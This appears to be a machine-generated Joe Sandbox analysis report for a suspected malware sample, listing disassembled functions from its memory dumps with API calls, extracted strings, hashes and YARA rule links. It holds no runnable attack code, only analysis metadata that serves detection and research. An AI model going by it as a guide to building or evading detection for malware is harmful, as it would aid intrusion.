Opcode Fuzzy Hash: 31af35c6b71e2d962365d71d40d21a60b33455a1e4ff40e152bb062977844421
Instruction Fuzzy Hash: 92213C32604104BADB3AAB54DD05BE777AAAF5CB50B678824E90AD7110E732DFC2D350

Function 00312A13 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030E783: GetLastError.KERNEL32(00000000,?,00310AB9), ref: 0030E787
Part of subcall function 0030E783: SetLastError.KERNEL32(00000000,?,?,00000028,0030B9D2), ref: 0030E829

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00312B1B
IsValidCodePage.KERNEL32(00000000), ref: 00312B59
IsValidLocale.KERNEL32(?,00000001), ref: 00312B6C
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00312BB4
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00312BCF

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: f6ba89b025db9b26e7d5dd96e985f0bbbc60776405022b1e093e9474b76120d7
Instruction ID: 65aa9ed6ca9f3e7f98f5de153f46f1db278d6bb9d3eecaa1b4b9af8182aa8840
Opcode Fuzzy Hash: f6ba89b025db9b26e7d5dd96e985f0bbbc60776405022b1e093e9474b76120d7
Instruction Fuzzy Hash: 77517171A00215AFDB2ADFA4CC45AFF77B8FF1C700F158469A910EB190DB709A91CB61

Function 00301614 Relevance: 7.7, APIs: 5, Instructions: 171fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00301098: _strlen.LIBCMT ref: 003010F9

GetFileSize.KERNEL32(00000000,00000000), ref: 00301685
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003016AB
CloseHandle.KERNEL32(00000000), ref: 003016BA
_strlen.LIBCMT ref: 00301705
CloseHandle.KERNEL32(00000000), ref: 00301805

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: CloseFileHandle_strlen$ReadSize
String ID:
API String ID: 1490117831-0
Opcode ID: 8b3929855cba5fce51b4a26e0909167e9dfcea4390266b20fc9874f326387001
Instruction ID: 64baef71fdb7621e0e4bbb48feede0941d9794c3188d0f886d81ff5eddb8b96e
Opcode Fuzzy Hash: 8b3929855cba5fce51b4a26e0909167e9dfcea4390266b20fc9874f326387001
Instruction Fuzzy Hash: 1F51F1B19063409BC712EF24CC95B2BB7E9FF89704F154A2DF8899B291E734EA44C752

Function 00421E5D Relevance: 7.0, Strings: 5, Instructions: 771COMMON

Download Yara Rule

Strings

|z{s, xrefs: 00421F87
<::", xrefs: 00421F2F
*5"6, xrefs: 00421FB0, 00421FF8
;?9?, xrefs: 00421F1F
2'B, xrefs: 00422726

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: *5"6$2'B$;?9?$<::"$|z{s
API String ID: 0-2233493934
Opcode ID: 3eee5b836ae0f515c7c92f77bed8a3f5db9060adc83eb389fd6df0f35b1e6108
Instruction ID: 31cb32e2952eeb5aed6972eb9c42189e7d299ecb1d180cd1af740fb1545a0b43
Opcode Fuzzy Hash: 3eee5b836ae0f515c7c92f77bed8a3f5db9060adc83eb389fd6df0f35b1e6108
Instruction Fuzzy Hash: 4B421135608312DFD318CF28EC5062AB3E2FBCA315F59893CE99697391EB34A915CB45

Function 0041C84E Relevance: 6.7, Strings: 5, Instructions: 460COMMON

Download Yara Rule

Strings

9[|], xrefs: 0041CB09
.S'U, xrefs: 0041CAFB
wy, xrefs: 0041CB3A
OPq, xrefs: 0041CB2C
#K#M, xrefs: 0041CB25

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: OPq$#K#M$.S'U$9[|]$wy
API String ID: 0-3101808513
Opcode ID: ae791013f75915224645d429e3e48cadc28e70b9a9d6946a843c06380c1750ee
Instruction ID: 5fa6e41981c0831dd4ec5c839a58323b70f6fb27576189598393d7bcf829b61f
Opcode Fuzzy Hash: ae791013f75915224645d429e3e48cadc28e70b9a9d6946a843c06380c1750ee
Instruction Fuzzy Hash: EFC1D1B6E402258BCB24CFA4C8913EFB7B2FF95701F194159E8857B345E7395802CB98

Function 00427870 Relevance: 6.5, Strings: 5, Instructions: 288COMMON

Download Yara Rule

Strings

Q6UH, xrefs: 00427A5A
T2O4, xrefs: 00427A52
IJ, xrefs: 00427A62
X>I0, xrefs: 00427A4A
)*, xrefs: 0042793A

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: )*$IJ$Q6UH$T2O4$X>I0
API String ID: 0-1099045505
Opcode ID: 9365707c404be2698cf9a05914d124c7d3878b057f98c579c3d4a821c87a109c
Instruction ID: 3b1423c738d2acf67b80311c3b3b65470ac689b0e831acf1128768528a4d1599
Opcode Fuzzy Hash: 9365707c404be2698cf9a05914d124c7d3878b057f98c579c3d4a821c87a109c
Instruction Fuzzy Hash: 357102B660C3218BC714CF68D89136BB7E1FF85354F49892DE8D58B391E3789A05C78A

Function 0031375A Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0031384A

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 5f4a032ba484e039fe4aef7b47d35641843afeee5091515f22fc5e02ad112349
Instruction ID: 3c147f8b7bc21c8fc736ff5968b1e6af3409f9f25e4db9ca76378f279e5ffa12
Opcode Fuzzy Hash: 5f4a032ba484e039fe4aef7b47d35641843afeee5091515f22fc5e02ad112349
Instruction Fuzzy Hash: AE71B3B19051695EDF2A9F288C9DBFAB7B9AB09300F1441DAE04997251DB354FC58F10

Function 00305020 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0030502C
IsDebuggerPresent.KERNEL32 ref: 003050F8
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00305111
UnhandledExceptionFilter.KERNEL32(?), ref: 0030511B

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e15e3b71a9bdca2b29acf69ec4e6ef94e7420c38c20a8c34ba0ce6f229112468
Instruction ID: 9101f973dcff5caa5318c276342dde27977201d82454d3b63f1c748f992007eb
Opcode Fuzzy Hash: e15e3b71a9bdca2b29acf69ec4e6ef94e7420c38c20a8c34ba0ce6f229112468
Instruction Fuzzy Hash: 923129B5D062189BDF21DF64D9497CDBBB8AF08300F1041AAE40CAB290EB759B858F44

Function 00418782 Relevance: 5.3, Strings: 4, Instructions: 287COMMON

Download Yara Rule

Strings

ZY, xrefs: 00418972
EA, xrefs: 00418979
2C, xrefs: 0041896B
NV, xrefs: 00418964

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: 2C$EA$NV$ZY
API String ID: 0-49861532
Opcode ID: 86d5ef4f31b0eac91997b4d94ac876ac2f5edc41cc7ac1bdfa816893f33ff74b
Instruction ID: 6257ed46bba85acc92184adddb57fb7eb053b09438e58da646b00c9723c3129f
Opcode Fuzzy Hash: 86d5ef4f31b0eac91997b4d94ac876ac2f5edc41cc7ac1bdfa816893f33ff74b
Instruction Fuzzy Hash: BB91A9B4104701DFDB248F25D8906667BB1FF4A704F1589ADC89A8F35ADB39E881CF94

Function 004161FA Relevance: 5.1, Strings: 3, Instructions: 1361COMMON

Download Yara Rule

Strings

H%C', xrefs: 00416873
p-./, xrefs: 00416881
f!K#, xrefs: 0041686C

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: H%C'$f!K#$p-./
API String ID: 0-2974429307
Opcode ID: c0906e34e44055a4c205a80bdf56cc2d9dc8d72a392ce4bac5f7d9f3d0ea0a68
Instruction ID: f51800d709bb49b49c37dc47da6f8ce97411645a88a1b5d3b75bbaeb89ec4e47
Opcode Fuzzy Hash: c0906e34e44055a4c205a80bdf56cc2d9dc8d72a392ce4bac5f7d9f3d0ea0a68
Instruction Fuzzy Hash: 0D92DD75200701CFD724CF29C891763B7E2FF9A314B19896ED8968BB91E739E842CB14

Function 0030123B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85encryptionCOMMON

Download Yara Rule

APIs

CryptContextAddRef.ADVAPI32(00000000,00000000,00000000), ref: 003012C7

Strings

[+], xrefs: 003012E1

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: ContextCrypt
String ID: [+]
API String ID: 3075001677-4228040803
Opcode ID: 57e315e2c92112cd5ab4968b277caad5a0ad983d86b684d1331570d6f1752e45
Instruction ID: 9cb37e48b8282404601ed0f0284a95619261fb048945735c5e749cf8d0720b94
Opcode Fuzzy Hash: 57e315e2c92112cd5ab4968b277caad5a0ad983d86b684d1331570d6f1752e45
Instruction Fuzzy Hash: 2531273550D3804BD727AB38A8997EBBBD4AFAE318F19097CD8C987283C2615446C762

Function 0040B35D Relevance: 2.9, Strings: 2, Instructions: 442COMMON

Download Yara Rule

Strings

vz, xrefs: 0040B481
(*, xrefs: 0040B3FA

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: vz$(*
API String ID: 0-1810138279
Opcode ID: bc795fc9593d117f69d9b309d8d1678bdc7bb38d1fb9af47afbff97a2df02f4c
Instruction ID: 373eca2d3372cdd70558ea5784a7e56b1569bdbd69d34e33fac87daed3807233
Opcode Fuzzy Hash: bc795fc9593d117f69d9b309d8d1678bdc7bb38d1fb9af47afbff97a2df02f4c
Instruction Fuzzy Hash: 490286B5204701CFD324CF25E991B267BF1FB8A300F1685BDE19A8B662DB74A446CF58

Function 0042C661 Relevance: 2.8, Strings: 2, Instructions: 292COMMON

Download Yara Rule

Strings

02, xrefs: 0042CE1B
k$XM, xrefs: 0042CEA2

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: k$XM$02
API String ID: 0-3645340089
Opcode ID: a66173981124d7008d27a57aeb78949d0a0e602045b34e4fd00f402ea6ce836f
Instruction ID: 13d92fa4c31d488c60226f1b790a3187eebd04651bff5118c22f23bcf6eb8d79
Opcode Fuzzy Hash: a66173981124d7008d27a57aeb78949d0a0e602045b34e4fd00f402ea6ce836f
Instruction Fuzzy Hash: AC8107706047918BD3258F2AD490327FBE1AF97304F68C59ED4DA8B392CB79A407CB55

Function 0042C6B0 Relevance: 2.8, Strings: 2, Instructions: 287COMMON

Download Yara Rule

Strings

02, xrefs: 0042CE1B
k$XM, xrefs: 0042CEA2

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: k$XM$02
API String ID: 0-3645340089
Opcode ID: 88e8cb6286f2b67592398981c80a604d80a239687b165b3d892a7056be522567
Instruction ID: 8486a6ca6ef0432e73a64b8f33dca97ee1ff33de2e9125a755b692dfa59e889f
Opcode Fuzzy Hash: 88e8cb6286f2b67592398981c80a604d80a239687b165b3d892a7056be522567
Instruction Fuzzy Hash: 3481E6706047928BD7158F3A9490327BBE1AF97304F68C5AED0DA8B392CB79A407CB55

Function 0042C69E Relevance: 2.8, Strings: 2, Instructions: 259COMMON

Download Yara Rule

Strings

02, xrefs: 0042CE1B
k$XM, xrefs: 0042CEA2

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: k$XM$02
API String ID: 0-3645340089
Opcode ID: 3cc09609d5efc333a6acc8853371c99c98345936378cdd70d2903306b9378b24
Instruction ID: f50683e4a251d12fd46d261370c77af8c449dc8eb74b8725cadbfee1003f3c0d
Opcode Fuzzy Hash: 3cc09609d5efc333a6acc8853371c99c98345936378cdd70d2903306b9378b24
Instruction Fuzzy Hash: 1971D2716047918BD3168F2A9490326FFE2AFA7304F68C59ED0DA4B392C779A407CB95

Function 0042CC0E Relevance: 2.8, Strings: 2, Instructions: 257COMMON

Download Yara Rule

Strings

02, xrefs: 0042CE1B
k$XM, xrefs: 0042CEA2

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: k$XM$02
API String ID: 0-3645340089
Opcode ID: ca4ee5496d6531026c593b85f0285854670459727e068aaa3c7d207f64eb9cf2
Instruction ID: aa126381ea6bb095719112affaf45f40dadcdf94d3070ec07542df453e69526b
Opcode Fuzzy Hash: ca4ee5496d6531026c593b85f0285854670459727e068aaa3c7d207f64eb9cf2
Instruction Fuzzy Hash: 627104706047918BD3168F2A9490367FFE2AFA7304F68C59ED0DA4B392C779A407CB95

Function 0041703C Relevance: 2.7, Strings: 2, Instructions: 211COMMON

Download Yara Rule

Strings

T"D$, xrefs: 00417199
H.M , xrefs: 00417192

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: H.M $T"D$
API String ID: 0-2923313461
Opcode ID: 66fb479fc717423183890f232c5f54e904ecc4e71b7d6a62289c9005d4df4375
Instruction ID: 63a4b4535a0efdea7b6357f2346164b773affaf991aad46119c0a3f7eb62c0b6
Opcode Fuzzy Hash: 66fb479fc717423183890f232c5f54e904ecc4e71b7d6a62289c9005d4df4375
Instruction Fuzzy Hash: AC51D6756047008FD325CF28C881BA3B7F2EF96310F19855EE8A68B391D738E842C764

Function 0042AFFD Relevance: 2.7, Strings: 2, Instructions: 191COMMON

Download Yara Rule

Strings

LwtJ, xrefs: 0042B097
rFDN, xrefs: 0042B15E

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: LwtJ$rFDN
API String ID: 0-1255102257
Opcode ID: b4ef04f43239fa8514196e7e22a69623b4eb3b380d4fd1e3232350cc137b7b56
Instruction ID: 23657ca543885c4e7040de47d94f52d02b11e6d88161757131fbadc548fb3af2
Opcode Fuzzy Hash: b4ef04f43239fa8514196e7e22a69623b4eb3b380d4fd1e3232350cc137b7b56
Instruction Fuzzy Hash: 2D5124706087928FD715CF26D4A0272BBE2EF97314B28C49EC0C68B746CB39980BCB54

Function 0042AFB4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

LwtJ, xrefs: 0042B097
rFDN, xrefs: 0042B15E

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: LwtJ$rFDN
API String ID: 0-1255102257
Opcode ID: a6e9f41cc275e7be94252960e50aedb2edf759a8bbcc65bc76bbd625524cdb66
Instruction ID: 5e103bd156cf00e168643e0714c9a4151f6861b1933768fc15cb14c94ef28a88
Opcode Fuzzy Hash: a6e9f41cc275e7be94252960e50aedb2edf759a8bbcc65bc76bbd625524cdb66
Instruction Fuzzy Hash: 435105706046918FDB158F26D4A0672BBE1EF9734472884CEC0C68F753CB399807CB54

Function 0042AF44 Relevance: 2.6, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

LwtJ, xrefs: 0042B097
rFDN, xrefs: 0042B15E

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: LwtJ$rFDN
API String ID: 0-1255102257
Opcode ID: 444531a9e9d6de0a23d2cf825c2c02117726caac540634e9fa92b1395273db5f
Instruction ID: 88f52dc626e3553bade033757b2d428ea1bfd2dfa0e2d97bbcfdcb5fb9851849
Opcode Fuzzy Hash: 444531a9e9d6de0a23d2cf825c2c02117726caac540634e9fa92b1395273db5f
Instruction Fuzzy Hash: FA41DF746046918FDB158F25D4A0672BBE1EF97358729848EC0C69B753CB399807CBA8

Function 00427F39 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

$, xrefs: 00428400

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: fa07b081e077d44ff63c2445c7bd721aa3bc241911009e0f8a5e29a0284c0b82
Instruction ID: a726412e75d917fc6d5b6ea03f94b32ec0921681666c5b61af8630c96cbb957d
Opcode Fuzzy Hash: fa07b081e077d44ff63c2445c7bd721aa3bc241911009e0f8a5e29a0284c0b82
Instruction Fuzzy Hash: B3A166B69083509FC320DF24D84166FB7E1EFD2304F09893EE5955B352EA39E805CB8A

Function 004090A0 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

{, xrefs: 004091C5

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: {
API String ID: 0-366298937
Opcode ID: 4d91d576a596ede954f1abddab5f265abb145e5bfa7b12ee0cd7d41707fe8d16
Instruction ID: cd6e171ae638edb2aa2aadc1d95dbbb17b5d2586a7cfd8864c1caeb2ccff934b
Opcode Fuzzy Hash: 4d91d576a596ede954f1abddab5f265abb145e5bfa7b12ee0cd7d41707fe8d16
Instruction Fuzzy Hash: F071D36060C3858FD305CE2984A076BBFE1AF97301F0889BDE4D59B386D6798D0AC766

Function 0041AC69 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

>, xrefs: 0041AD07

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: >
API String ID: 0-325317158
Opcode ID: f692c9b346749b832776912492db2ec2b6bbaa13d2c3928a9aaf16eea73d84e5
Instruction ID: 72ffc954c5a75874b646eb390d9e65fd734d6d110dfad6019bfdc9158c99ef10
Opcode Fuzzy Hash: f692c9b346749b832776912492db2ec2b6bbaa13d2c3928a9aaf16eea73d84e5
Instruction Fuzzy Hash: B2217D318493918FD315CF25984126BBBE29BD2314F088A2DF4D1A7392D639C907CB97

Function 0041A951 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

HDJ+, xrefs: 0041A959

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID: HDJ+
API String ID: 0-2925384733
Opcode ID: 8e6451a09ac81abad7dc6ebc77afccc77425753aa553fa6cb2ee2eef2219b886
Instruction ID: e5621f01ed5ca240ae72ee065287fd3420eca4d8398eccc5a2797727be0da41d
Opcode Fuzzy Hash: 8e6451a09ac81abad7dc6ebc77afccc77425753aa553fa6cb2ee2eef2219b886
Instruction Fuzzy Hash: 9A11973890A3909AD3118A2990507B7FFE18F93354F18949FF4D19B392D238C886CB9B

Function 00414486 Relevance: .9, Instructions: 901COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730f3cc571933944c28946b461e484f1234e384205b40270f5a2192d021e5266
Instruction ID: cd79e90251fd10c05869fae088a33c4b93fa5b390f036ce57858fbdc49722184
Opcode Fuzzy Hash: 730f3cc571933944c28946b461e484f1234e384205b40270f5a2192d021e5266
Instruction Fuzzy Hash: 444251BAE40110DFCB288F54EC40BBE73B2EB8A715F19812DE945A7395DB395C01CB98

Function 00402F00 Relevance: .7, Instructions: 687COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d34d3f29df3e5ddb155ec1cf723753776ad238508d42524458d56e5cd52fc11a
Instruction ID: 6f5b49b59f734ff4ae360bd3fe08ba6e6963712f3571b0a73b295e2304c0f4c0
Opcode Fuzzy Hash: d34d3f29df3e5ddb155ec1cf723753776ad238508d42524458d56e5cd52fc11a
Instruction Fuzzy Hash: 145205716083459FCB14CF28C4906AAFBE1BF89305F18897EF89967381D778E945CB89

Function 00413DE2 Relevance: .7, Instructions: 658COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ed5e1f4f3b807e3656553c6cf256810d55518e95a675d2aaa572c4fbfa0015
Instruction ID: 2beea08e8f4b2f9c44276ff57c7b5a9458684d77f8a9dc1b5fb50ebf3f0061d4
Opcode Fuzzy Hash: 48ed5e1f4f3b807e3656553c6cf256810d55518e95a675d2aaa572c4fbfa0015
Instruction Fuzzy Hash: 850205B2E002158BDB14CF68C8927EBB7F1EF5A310F194069EC85AB391E3799D81C795

Function 0043C0A0 Relevance: .6, Instructions: 638COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1780ea1a72ac7c4ed1ae8cba3c04fefe656e8b1d8ce7d34feb59910ff8156e9
Instruction ID: bab2e67e3e96969620708ba52279bd114ed330fb0f5efaa2df7688b03f088f4e
Opcode Fuzzy Hash: c1780ea1a72ac7c4ed1ae8cba3c04fefe656e8b1d8ce7d34feb59910ff8156e9
Instruction Fuzzy Hash: B412F23A618211CFC708DF28E8D166AB7E1FB8E315F1A887EE58587391D734D845CB86

Function 00407450 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d94395d1d21f4634844847a8cedfe468290310b3421f90656b1f3195f54f77f7
Instruction ID: 3cae87f066e1e6e6886db27b97f4e4ac774ff9de2259b17d526dc86e33009402
Opcode Fuzzy Hash: d94395d1d21f4634844847a8cedfe468290310b3421f90656b1f3195f54f77f7
Instruction Fuzzy Hash: 5922C272A087119BD724DF18D8846ABB3E1EFC4315F19893ED986A7381D738B851CB87

Function 0043C1A0 Relevance: .5, Instructions: 532COMMON

Download Yara Rule

